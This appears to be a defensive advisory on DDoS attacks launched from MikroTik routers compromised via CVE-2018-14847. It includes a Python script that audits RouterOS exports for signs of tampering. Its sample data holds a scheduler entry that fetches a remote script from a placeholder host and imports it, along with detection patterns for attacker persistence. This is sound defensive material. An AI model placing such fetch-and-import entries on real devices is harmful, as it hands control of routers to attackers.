Alert: Resurgence of DDoS Attacks via MikroTik Routers - Protect Your Network Now

In early September 2021, QRATOR Labs published research on a new wave of DDoS (Distributed Denial of Service) attacks launched from a large pool of compromised MikroTik routers. The development is alarming because the attackers are not using anything new: they are abusing devices that were taken over through a RouterOS vulnerability patched back in 2018, which many operators assumed had been put to rest.

A Look Back at the Vulnerability

The root of the issue is a vulnerability in MikroTik's RouterOS found in 2018 (CVE-2018-14847, a flaw in the Winbox service that let an unauthenticated attacker read files from the device, including the user database). MikroTik released a fix quickly, but devices that were compromised before the patch was applied are still under the attackers' control. The current attacks do not rely on a new weakness in RouterOS, nor on malware hidden in the device's file system. Instead, the attackers reconfigure the router for their own remote access using ordinary RouterOS features and commands, turning the device's own functionality against it.

The Persistent Threat

Installing the patch that closed the old vulnerability does not by itself make an affected router safe. If an attacker obtained your password before you upgraded, they still have valid credentials after the upgrade. You must also change the password, review the firewall so that unauthorized remote access is blocked, and remove any scripts and configuration entries you did not create yourself.

Despite outreach efforts, many RouterOS users remain unaware of the problem, mostly because they neither stay in contact with MikroTik nor actively monitor their devices. MikroTik is working on further measures to improve security.

No New Vulnerabilities

It's crucial to note that no new vulnerabilities have been identified in these devices, and RouterOS has undergone rigorous audits by several independent entities. However, vigilance and proactive measures are essential.

To safeguard your network against these revived threats, consider the following actions:

  • Regular Updates: Ensure your MikroTik device is running the latest software version.
  • Restrict Access: Do not expose the device's management services to the open internet. Where remote access is genuinely needed, reach the device through a VPN such as IPsec.
  • Strong Password Policy: Implement and regularly update strong passwords.
  • Monitor and Adjust Configurations: Keep an eye out for unfamiliar settings within your RouterOS configuration, which could indicate tampering.

Working with cybersecurity researchers, MikroTik has also learned of malware that runs on Windows computers inside a network and attempts to reconfigure the MikroTik devices it finds there. This is a further reason to use strong passwords and keep RouterOS up to date, so that already fixed vulnerabilities such as CVE-2018-14847 cannot be exploited from inside the LAN.

Specific Configurations to Watch

Be wary of the following configurations and adjust or remove them as needed:

  • System Scheduler: Remove scheduler entries whose on-event runs /tool fetch (directly or through a script), as these are used to pull and apply the attackers' configuration.
  • IP Socks Proxy: Disable the SOCKS proxy if you did not enable it yourself or do not use it.
  • L2TP Clients: Remove any L2TP client you do not recognize, in particular one named "lvpn".
  • Firewall Rules: Scrutinize, and usually remove, any filter rule that accepts traffic to port 5678.
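Auditing these indicators by hand on one router is easy; doing it across a fleet is where mistakes happen. The following script is an added example (not MikroTik's code and not part of the original advisory) that parses the text produced by the RouterOS `/export` command and flags the four indicators above plus /system script entries that call fetch, printing a suggested RouterOS command for each hit. The export text embedded in it is constructed for the example; the scheduler name U6, the URL and the L2TP peer address are assumptions, not real indicators. The port check goes slightly beyond the page in that it handles RouterOS port lists and ranges such as `5000-6000,8291`, not just a bare `5678`.

```python
"""Audit a RouterOS `/export` dump for the indicators listed above.

Added example, not MikroTik's own code. SAMPLE_EXPORT is constructed; the
scheduler name, URL and L2TP peer address in it are assumptions.
"""
import shlex
from dataclasses import dataclass, field

# Constructed `/export` output mixing benign and suspicious entries.
SAMPLE_EXPORT = """\
# sep/10/2021 12:00:00 by RouterOS 6.48.4
/interface l2tp-client
add connect-to=203.0.113.10 name=lvpn user=lvpn
/ip socks
set enabled=yes port=5678
/system scheduler
add interval=10m name=U6 on-event="/tool fetch url=http://example.invalid/u.rsc mode=http dst-path=u.rsc; /import u.rsc" \\
    policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
add interval=1d name=backup on-event="/system backup save" policy=read,write start-time=03:00:00
/ip firewall filter
add action=accept chain=input connection-state=established,related
add action=accept chain=input dst-port=5000-6000,8291 protocol=tcp
add action=drop chain=input in-interface=ether1
"""


@dataclass
class Entry:
    path: str                 # menu path, e.g. "/system scheduler"
    verb: str                 # "add" or "set"
    props: dict = field(default_factory=dict)


def _logical_lines(text):
    """Join physical lines that RouterOS wrapped with a trailing backslash."""
    buf = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield buf + line
        buf = ""
    if buf:
        yield buf


def parse_export(text):
    """Turn `/export` text into Entry objects (menu path + key=value props)."""
    entries, path = [], None
    for line in _logical_lines(text):
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # menu path header for the lines below it
            path = line
            continue
        tokens = shlex.split(line)        # keeps "quoted values with spaces" whole
        props = {}
        for tok in tokens[1:]:
            key, sep, value = tok.partition("=")
            if sep:                       # skip positional bits such as "[ find ... ]"
                props[key] = value
        entries.append(Entry(path, tokens[0], props))
    return entries


def port_matches(spec, port):
    """True if a RouterOS port list like "5678" or "5000-6000,8291" covers port."""
    for part in spec.split(","):
        if not part:
            continue
        lo, _, hi = part.partition("-")
        if hi:
            if int(lo) <= port <= int(hi):
                return True
        elif int(lo) == port:
            return True
    return False


def audit(entries):
    """Return (indicator, detail, suggested RouterOS command) for each hit."""
    findings = []
    for e in entries:
        name = e.props.get("name", "?")
        if e.path == "/system scheduler" and "fetch" in e.props.get("on-event", "").lower():
            findings.append(("scheduler-fetch", e.props["on-event"],
                             f'/system scheduler remove [find name="{name}"]'))
        elif e.path == "/system script" and "fetch" in e.props.get("source", "").lower():
            findings.append(("script-fetch", e.props["source"],
                             f'/system script remove [find name="{name}"]'))
        elif e.path == "/ip socks" and e.props.get("enabled") == "yes":
            findings.append(("socks-enabled", f"port {e.props.get('port', '1080')}",
                             "/ip socks set enabled=no"))
        elif e.path == "/interface l2tp-client":
            findings.append(("l2tp-client", f"{name} -> {e.props.get('connect-to')}",
                             f'/interface l2tp-client remove [find name="{name}"]'))
        elif (e.path == "/ip firewall filter" and e.props.get("chain") == "input"
              and e.props.get("action") == "accept"
              and port_matches(e.props.get("dst-port", ""), 5678)):
            findings.append(("fw-accept-5678", e.props.get("dst-port"),
                             f'/ip firewall filter remove [find chain=input dst-port="{e.props["dst-port"]}" action=accept]'))
    return findings


def audit_text(text):
    return audit(parse_export(text))


if __name__ == "__main__":
    for kind, detail, fix in audit_text(SAMPLE_EXPORT):
        print(f"{kind:16} {detail}\n    fix: {fix}")
```

Feed it the output of `/export` collected over SSH from each router and review the suggested commands before running them: an L2TP client or a SOCKS proxy you set up yourself is not an indicator, and the script cannot tell the difference. The established/related accept rule in the sample is deliberately not flagged, since it carries no port; only rules whose port list actually covers 5678 are reported.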

Furthermore, asking your ISP to block connections to the malicious domains linked to these attacks adds a layer of protection for devices you have not yet been able to clean up.

Conclusion

The resurgence of DDoS attacks from MikroTik routers is a reminder that a patched vulnerability is not the same as an evicted attacker. By upgrading regularly, keeping management interfaces off the open internet, rotating passwords after any suspected compromise, and checking the configuration for entries you did not create, operators can keep their routers from being conscripted into these and future attacks.